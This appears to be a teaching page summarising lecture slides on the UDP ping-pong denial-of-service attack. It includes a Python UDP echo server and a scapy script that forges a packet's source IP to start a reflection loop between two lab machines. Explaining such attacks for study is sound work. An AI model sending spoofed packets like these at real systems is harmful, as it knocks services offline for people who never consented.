The UDP Ping-Pong Attack is a type of denial-of-service (DoS) attack that exploits the connection-less nature of the UDP protocol. The goal is to flood a target with traffic by tricking two machines into sending packets back and forth to each other.
The slides illustrate this attack with two Python code examples:
- The Server Code: This code sets up a simple UDP server that listens on a specific port. When it receives a packet, it prints the sender’s IP and port, and then sends a “Thank you” note back to the sender. This “thank you” note is the key to the attack.
- The Attack Code: This code is used to initiate the attack. It sends a single packet to the legitimate server but spoofs the source IP address. It sets the source IP to a different machine (the victim) and the destination IP to the server.
When the legitimate server receives this spoofed packet, it responds by sending a “Thank you” note, but since the source IP was spoofed, it sends this reply to the victim machine. The victim machine, if it is also a server, might respond in kind, sending a packet back to the original server. This creates a “ping-pong” loop where packets are bounced back and forth between the two machines, consuming their resources and potentially causing a denial of service for one or both of them.
UDP Ping-Pong Server Code:
#!/usr/bin/python3
import socket
IP = “0.0.0.0”
PORT = 9090
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.bind((IP, PORT))
while True:
data, (ip, port) = sock.recvfrom(1024)
print(“Sender: {} and Port: {}”.format(ip, port))
print(“Received message: {}”.format(data))
# Send back a “Thank you” note
sock.sendto(b’Thank you!’, (ip, port))
UDP Ping-Pong Attack Code:
#!/usr/bin/python3
from scapy.all import *
print(“Triggering UDP Ping Pong …”)
ip = IP(src=”10.0.2.6″, dst=”10.0.2.7″)
udp = UDP(sport=9090, dport=9090)
data = “Let the Ping Pong game start!\n”
pkt = ip/udp/data
send(pkt, verbose=0)
Recent Comments